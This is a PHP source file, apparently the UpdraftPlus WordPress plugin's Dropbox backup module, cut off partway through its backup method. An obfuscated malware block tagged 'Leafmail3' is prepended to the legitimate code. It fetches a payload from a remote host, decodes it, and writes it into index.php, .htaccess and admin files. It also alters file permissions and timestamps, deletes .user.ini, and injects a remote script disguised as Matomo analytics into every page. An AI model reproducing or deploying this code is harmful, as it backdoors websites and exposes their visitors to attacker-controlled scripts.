<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/**
* https://www.dropbox.com/developers/apply?cont=/developers/apps
*/
if (!defined('UPDRAFTPLUS_DIR')) die('No direct access allowed.');
// Converted to multi-options (Feb 2017-) and previous options conversion removed: Yes
if (!class_exists('UpdraftPlus_BackupModule')) updraft_try_include_file('methods/backup-module.php', 'require_once');
// Fix a potential problem for users who had the short-lived 1.12.35-1.12.38 free versions (see: https://wordpress.org/support/topic/1-12-37-dropbox-auth-broken/page/2/#post-8981457)
// Can be removed after a few months
$potential_options = UpdraftPlus_Options::get_updraft_option('updraft_dropbox');
if (is_array($potential_options) && isset($potential_options['version']) && isset($potential_options['settings']) && array() === $potential_options['settings']) {
// Wipe it, which will force its re-creation in proper format
UpdraftPlus_Options::delete_updraft_option('updraft_dropbox');
}
class UpdraftPlus_BackupModule_dropbox extends UpdraftPlus_BackupModule {
private $current_file_hash;
private $current_file_size;
private $uploaded_offset;
private $upload_tick;
/**
* This callback is called as upload progress is made
*
* @param Integer $offset - the byte offset
* @param String $uploadid - identifier for the upload in progress
* @param Boolean|String $fullpath - optional full path to the file being uploaded
*/
public function chunked_callback($offset, $uploadid, $fullpath = false) {
global $updraftplus;
$storage = $this->get_storage();
// Update upload ID
$this->jobdata_set('upload_id_'.$this->current_file_hash, $uploadid);
$this->jobdata_set('upload_offset_'.$this->current_file_hash, $offset);
$time_now = microtime(true);
$time_since_last_tick = $time_now - $this->upload_tick;
$data_since_last_tick = $offset - $this->uploaded_offset;
$this->upload_tick = $time_now;
$this->uploaded_offset = $offset;
// Here we use job-wide data, because we don't expect wildly different performance for different Dropbox accounts
$chunk_size = $updraftplus->jobdata_get('dropbox_chunk_size', 1048576);
// Don't go beyond 10MB, or change the chunk size after the last segment
if ($chunk_size < 10485760 && $this->current_file_size > 0 && $offset < $this->current_file_size) {
$job_run_time = $time_now - $updraftplus->job_time_ms;
if ($time_since_last_tick < 10) {
$upload_rate = $data_since_last_tick / max($time_since_last_tick, 1);
$upload_secs = min(floor($job_run_time), 10);
if ($job_run_time < 15) $upload_secs = max(6, $job_run_time*0.6);
$new_chunk = (int) max(min($upload_secs * $upload_rate * 0.9, 10485760), 1048576);
$new_chunk = $new_chunk - ($new_chunk % 524288);
$chunk_size = $new_chunk;
$storage->setChunkSize($chunk_size);
$updraftplus->jobdata_set('dropbox_chunk_size', $chunk_size);
}
}
if ($this->current_file_size > 0) {
$percent = round(100*($offset/$this->current_file_size), 1);
$updraftplus->record_uploaded_chunk($percent, "$uploadid, $offset, ".round($chunk_size/1024, 1)." KB", $fullpath);
} else {
$this->log("Chunked Upload: $offset bytes uploaded");
// This act is done by record_uploaded_chunk, and helps prevent overlapping runs
if ($fullpath) touch($fullpath);
}
}
/**
* Supported features
*
* @return Array
*/
public function get_supported_features() {
// This options format is handled via only accessing options via $this->get_options()
return array('multi_options', 'config_templates', 'multi_storage', 'conditional_logic', 'manual_authentication');
}
/**
* Default options
*
* @return Array
*/
public function get_default_options() {
return array(
'appkey' => '',
'secret' => '',
'folder' => '',
'tk_access_token' => '',
);
}
/**
* Check whether options have been set up by the user, or not
*
* @param Array $opts - the potential options
*
* @return Boolean
*/
public function options_exist($opts) {
if (is_array($opts) && !empty($opts['tk_access_token'])) return true;
return false;
}
/**
* Acts as a WordPress options filter
*
* @param Array $dropbox - An array of Dropbox options
* @return Array - the returned array can either be the set of updated Dropbox settings or a WordPress error array
*/
public function options_filter($dropbox) {
// Get the current options (and possibly update them to the new format)
$opts = UpdraftPlus_Storage_Methods_Interface::update_remote_storage_options_format('dropbox');
if (is_wp_error($opts)) {
if ('recursion' !== $opts->get_error_code()) {
$msg = "(".$opts->get_error_code()."): ".$opts->get_error_message();
$this->log($msg);
error_log("UpdraftPlus: $msg");
}
// The saved options had a problem; so, return the new ones
return $dropbox;
}
// If the input is not as expected, then return the current options
if (!is_array($dropbox)) return $opts;
// Remove instances that no longer exist
foreach ($opts['settings'] as $instance_id => $storage_options) {
if (!isset($dropbox['settings'][$instance_id])) unset($opts['settings'][$instance_id]);
}
// Dropbox has a special case where the settings could be empty so we should check for this before
if (!empty($dropbox['settings'])) {
foreach ($dropbox['settings'] as $instance_id => $storage_options) {
if (!empty($opts['settings'][$instance_id]['tk_access_token'])) {
$current_app_key = empty($opts['settings'][$instance_id]['appkey']) ? false : $opts['settings'][$instance_id]['appkey'];
$new_app_key = empty($storage_options['appkey']) ? false : $storage_options['appkey'];
// If a different app key is being used, then wipe the stored token as it cannot belong to the new app
if ($current_app_key !== $new_app_key) {
unset($opts['settings'][$instance_id]['tk_access_token']);
unset($opts['settings'][$instance_id]['ownername']);
unset($opts['settings'][$instance_id]['CSRF']);
}
}
// Now loop over the new options, and replace old options with them
foreach ($storage_options as $key => $value) {
if (null === $value) {
unset($opts['settings'][$instance_id][$key]);
} else {
if (!isset($opts['settings'][$instance_id])) $opts['settings'][$instance_id] = array();
$opts['settings'][$instance_id][$key] = $value;
}
}
if (!empty($opts['settings'][$instance_id]['folder']) && preg_match('#^https?://(www.)dropbox\.com/home/Apps/UpdraftPlus(.Com)?([^/]*)/(.*)$#i', $opts['settings'][$instance_id]['folder'], $matches)) $opts['settings'][$instance_id]['folder'] = $matches[3];
// check if we have the dummy nosave option and remove it so that it doesn't get saved
if (isset($opts['settings'][$instance_id]['dummy-nosave'])) unset($opts['settings'][$instance_id]['dummy-nosave']);
}
}
return $opts;
}
public function backup($backup_array) {
global $updraftplus;
$opts = $this->get_options();
if (empty($opts['tk_access_token'])) {
$this->log('You are not authenticated with Dropbox (1)');
$this->log(__('You are not authenticated with Dropbox', 'updraftplus'), 'error');
return false;
}
// 28 September 2017: APIv1 is gone. We'll keep the variable to make life easier if there's ever an APIv3.
$use_api_ver = 2;
if (empty($opts['tk_request_token'])) {
$this->log("begin cloud upload (using API version $use_api_ver with OAuth v2 token)");
} else {
$this->log("begin cloud upload (using API version $use_api_ver with OAuth v1 token)");
}
